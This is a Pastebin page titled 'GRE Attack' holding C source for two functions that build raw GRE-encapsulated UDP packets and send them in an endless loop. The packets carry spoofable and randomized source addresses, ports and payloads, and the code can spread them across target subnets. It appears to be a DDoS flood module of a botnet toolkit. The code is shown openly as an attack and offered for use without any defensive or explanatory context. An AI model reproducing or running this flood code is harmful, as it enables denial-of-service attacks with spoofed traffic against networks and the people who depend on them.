API tools faq
paste
Advertisement
MilkBubblesPaste

GRE Attack

MilkBubblesPaste
Jan 23rd, 2017
180
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 11.27 KB | None | 0 0
raw download clone embed print report
  1. #define _GNU_SOURCE
  2.  
  3. #ifdef DEBUG
  4. #include <stdio.h>
  5. #endif
  6. #include <stdlib.h>
  7. #include <unistd.h>
  8. #include <sys/socket.h>
  9. #include <linux/ip.h>
  10. #include <linux/if_ether.h>
  11. #include <errno.h>
  12.  
  13. #include "includes.h"
  14. #include "attack.h"
  15. #include "protocol.h"
  16. #include "util.h"
  17. #include "checksum.h"
  18. #include "rand.h"
  19.  
  20. void attack_gre_ip(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
  21. {
  22.     int i, fd;
  23.     char **pkts = calloc(targs_len, sizeof (char *));
  24.     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
  25.     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
  26.     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
  27.     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
  28.     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
  29.     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
  30.     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
  31.     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
  32.     BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
  33.     uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
  34.  
  35.     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  36.     {
  37. #ifdef DEBUG
  38.         printf("Failed to create raw socket. Aborting attack\n");
  39. #endif
  40.         return;
  41.     }
  42.     i = 1;
  43.     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
  44.     {
  45. #ifdef DEBUG
  46.         printf("Failed to set IP_HDRINCL. Aborting\n");
  47. #endif
  48.         close(fd);
  49.         return;
  50.     }
  51.  
  52.     for (i = 0; i < targs_len; i++)
  53.     {
  54.         struct iphdr *iph;
  55.         struct grehdr *greh;
  56.         struct iphdr *greiph;
  57.         struct udphdr *udph;
  58.  
  59.         pkts[i] = calloc(1510, sizeof (char *));
  60.         iph = (struct iphdr *)(pkts[i]);
  61.         greh = (struct grehdr *)(iph + 1);
  62.         greiph = (struct iphdr *)(greh + 1);
  63.         udph = (struct udphdr *)(greiph + 1);
  64.  
  65.         // IP header init
  66.         iph->version = 4;
  67.         iph->ihl = 5;
  68.         iph->tos = ip_tos;
  69.         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
  70.         iph->id = htons(ip_ident);
  71.         iph->ttl = ip_ttl;
  72.         if (dont_frag)
  73.             iph->frag_off = htons(1 << 14);
  74.         iph->protocol = IPPROTO_GRE;
  75.         iph->saddr = source_ip;
  76.         iph->daddr = targs[i].addr;
  77.  
  78.         // GRE header init
  79.         greh->protocol = htons(ETH_P_IP); // Protocol is 2 bytes
  80.  
  81.         // Encapsulated IP header init
  82.         greiph->version = 4;
  83.         greiph->ihl = 5;
  84.         greiph->tos = ip_tos;
  85.         greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
  86.         greiph->id = htons(~ip_ident);
  87.         greiph->ttl = ip_ttl;
  88.         if (dont_frag)
  89.             greiph->frag_off = htons(1 << 14);
  90.         greiph->protocol = IPPROTO_UDP;
  91.         greiph->saddr = rand_next();
  92.         if (gcip)
  93.             greiph->daddr = iph->daddr;
  94.         else
  95.             greiph->daddr = ~(greiph->saddr - 1024);
  96.  
  97.         // UDP header init
  98.         udph->source = htons(sport);
  99.         udph->dest = htons(dport);
  100.         udph->len = htons(sizeof (struct udphdr) + data_len);
  101.     }
  102.  
  103.     while (TRUE)
  104.     {
  105.         for (i = 0; i < targs_len; i++)
  106.         {
  107.             char *pkt = pkts[i];
  108.             struct iphdr *iph = (struct iphdr *)pkt;
  109.             struct grehdr *greh = (struct grehdr *)(iph + 1);
  110.             struct iphdr *greiph = (struct iphdr *)(greh + 1);
  111.             struct udphdr *udph = (struct udphdr *)(greiph + 1);
  112.             char *data = (char *)(udph + 1);
  113.  
  114.             // For prefix attacks
  115.             if (targs[i].netmask < 32)
  116.                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
  117.  
  118.             if (source_ip == 0xffffffff)
  119.                 iph->saddr = rand_next();
  120.  
  121.             if (ip_ident == 0xffff)
  122.             {
  123.                 iph->id = rand_next() & 0xffff;
  124.                 greiph->id = ~(iph->id - 1000);
  125.             }
  126.             if (sport == 0xffff)
  127.                 udph->source = rand_next() & 0xffff;
  128.             if (dport == 0xffff)
  129.                 udph->dest = rand_next() & 0xffff;
  130.  
  131.             if (!gcip)
  132.                 greiph->daddr = rand_next();
  133.             else
  134.                 greiph->daddr = iph->daddr;
  135.  
  136.             if (data_rand)
  137.                 rand_str(data, data_len);
  138.  
  139.             iph->check = 0;
  140.             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  141.  
  142.             greiph->check = 0;
  143.             greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
  144.  
  145.             udph->check = 0;
  146.             udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
  147.  
  148.             targs[i].sock_addr.sin_family = AF_INET;
  149.             targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
  150.             targs[i].sock_addr.sin_port = 0;
  151.             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
  152.         }
  153.  
  154. #ifdef DEBUG
  155.         if (errno != 0)
  156.             printf("errno = %d\n", errno);
  157.         break;
  158. #endif
  159.     }
  160. }
  161.  
  162. void attack_gre_eth(uint8_t targs_len, struct attack_target *targs, uint8_t opts_len, struct attack_option *opts)
  163. {
  164.     int i, fd;
  165.     char **pkts = calloc(targs_len, sizeof (char *));
  166.     uint8_t ip_tos = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TOS, 0);
  167.     uint16_t ip_ident = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_IDENT, 0xffff);
  168.     uint8_t ip_ttl = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_TTL, 64);
  169.     BOOL dont_frag = attack_get_opt_int(opts_len, opts, ATK_OPT_IP_DF, TRUE);
  170.     port_t sport = attack_get_opt_int(opts_len, opts, ATK_OPT_SPORT, 0xffff);
  171.     port_t dport = attack_get_opt_int(opts_len, opts, ATK_OPT_DPORT, 0xffff);
  172.     int data_len = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_SIZE, 512);
  173.     BOOL data_rand = attack_get_opt_int(opts_len, opts, ATK_OPT_PAYLOAD_RAND, TRUE);
  174.     BOOL gcip = attack_get_opt_int(opts_len, opts, ATK_OPT_GRE_CONSTIP, FALSE);
  175.     uint32_t source_ip = attack_get_opt_int(opts_len, opts, ATK_OPT_SOURCE, LOCAL_ADDR);
  176.  
  177.     if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
  178.     {
  179. #ifdef DEBUG
  180.         printf("Failed to create raw socket. Aborting attack\n");
  181. #endif
  182.         return;
  183.     }
  184.     i = 1;
  185.     if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &i, sizeof (int)) == -1)
  186.     {
  187. #ifdef DEBUG
  188.         printf("Failed to set IP_HDRINCL. Aborting\n");
  189. #endif
  190.         close(fd);
  191.         return;
  192.     }
  193.  
  194.     for (i = 0; i < targs_len; i++)
  195.     {
  196.         struct iphdr *iph;
  197.         struct grehdr *greh;
  198.         struct ethhdr *ethh;
  199.         struct iphdr *greiph;
  200.         struct udphdr *udph;
  201.         uint32_t ent1, ent2, ent3;
  202.  
  203.         pkts[i] = calloc(1510, sizeof (char *));
  204.         iph = (struct iphdr *)(pkts[i]);
  205.         greh = (struct grehdr *)(iph + 1);
  206.         ethh = (struct ethhdr *)(greh + 1);
  207.         greiph = (struct iphdr *)(ethh + 1);
  208.         udph = (struct udphdr *)(greiph + 1);
  209.  
  210.         // IP header init
  211.         iph->version = 4;
  212.         iph->ihl = 5;
  213.         iph->tos = ip_tos;
  214.         iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
  215.         iph->id = htons(ip_ident);
  216.         iph->ttl = ip_ttl;
  217.         if (dont_frag)
  218.             iph->frag_off = htons(1 << 14);
  219.         iph->protocol = IPPROTO_GRE;
  220.         iph->saddr = source_ip;
  221.         iph->daddr = targs[i].addr;
  222.  
  223.         // GRE header init
  224.         greh->protocol = htons(PROTO_GRE_TRANS_ETH); // Protocol is 2 bytes
  225.  
  226.         // Ethernet header init
  227.         ethh->h_proto = htons(ETH_P_IP);
  228.  
  229.         // Encapsulated IP header init
  230.         greiph->version = 4;
  231.         greiph->ihl = 5;
  232.         greiph->tos = ip_tos;
  233.         greiph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct udphdr) + data_len);
  234.         greiph->id = htons(~ip_ident);
  235.         greiph->ttl = ip_ttl;
  236.         if (dont_frag)
  237.             greiph->frag_off = htons(1 << 14);
  238.         greiph->protocol = IPPROTO_UDP;
  239.         greiph->saddr = rand_next();
  240.         if (gcip)
  241.             greiph->daddr = iph->daddr;
  242.         else
  243.             greiph->daddr = ~(greiph->saddr - 1024);
  244.  
  245.         // UDP header init
  246.         udph->source = htons(sport);
  247.         udph->dest = htons(dport);
  248.         udph->len = htons(sizeof (struct udphdr) + data_len);
  249.     }
  250.  
  251.     while (TRUE)
  252.     {
  253.         for (i = 0; i < targs_len; i++)
  254.         {
  255.             char *pkt = pkts[i];
  256.             struct iphdr *iph = (struct iphdr *)pkt;
  257.             struct grehdr *greh = (struct grehdr *)(iph + 1);
  258.             struct ethhdr *ethh = (struct ethhdr *)(greh + 1);
  259.             struct iphdr *greiph = (struct iphdr *)(ethh + 1);
  260.             struct udphdr *udph = (struct udphdr *)(greiph + 1);
  261.             char *data = (char *)(udph + 1);
  262.             uint32_t ent1, ent2, ent3;
  263.  
  264.             // For prefix attacks
  265.             if (targs[i].netmask < 32)
  266.                 iph->daddr = htonl(ntohl(targs[i].addr) + (((uint32_t)rand_next()) >> targs[i].netmask));
  267.  
  268.             if (source_ip == 0xffffffff)
  269.                 iph->saddr = rand_next();
  270.  
  271.             if (ip_ident == 0xffff)
  272.             {
  273.                 iph->id = rand_next() & 0xffff;
  274.                 greiph->id = ~(iph->id - 1000);
  275.             }
  276.             if (sport == 0xffff)
  277.                 udph->source = rand_next() & 0xffff;
  278.             if (dport == 0xffff)
  279.                 udph->dest = rand_next() & 0xffff;
  280.  
  281.             if (!gcip)
  282.                 greiph->daddr = rand_next();
  283.             else
  284.                 greiph->daddr = iph->daddr;
  285.  
  286.             ent1 = rand_next();
  287.             ent2 = rand_next();
  288.             ent3 = rand_next();
  289.             util_memcpy(ethh->h_dest, (char *)&ent1, 4);
  290.             util_memcpy(ethh->h_source, (char *)&ent2, 4);
  291.             util_memcpy(ethh->h_dest + 4, (char *)&ent3, 2);
  292.             util_memcpy(ethh->h_source + 4, (((char *)&ent3)) + 2, 2);
  293.  
  294.             if (data_rand)
  295.                 rand_str(data, data_len);
  296.  
  297.             iph->check = 0;
  298.             iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
  299.  
  300.             greiph->check = 0;
  301.             greiph->check = checksum_generic((uint16_t *)greiph, sizeof (struct iphdr));
  302.  
  303.             udph->check = 0;
  304.             udph->check = checksum_tcpudp(greiph, udph, udph->len, sizeof (struct udphdr) + data_len);
  305.  
  306.             targs[i].sock_addr.sin_family = AF_INET;
  307.             targs[i].sock_addr.sin_addr.s_addr = iph->daddr;
  308.             targs[i].sock_addr.sin_port = 0;
  309.             sendto(fd, pkt, sizeof (struct iphdr) + sizeof (struct grehdr) + sizeof (struct ethhdr) + sizeof (struct iphdr) + sizeof (struct udphdr) + data_len, MSG_NOSIGNAL, (struct sockaddr *)&targs[i].sock_addr, sizeof (struct sockaddr_in));
  310.         }
  311.  
  312. #ifdef DEBUG
  313.         if (errno != 0)
  314.             printf("errno = %d\n", errno);
  315.         break;
  316. #endif
  317.     }
  318. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!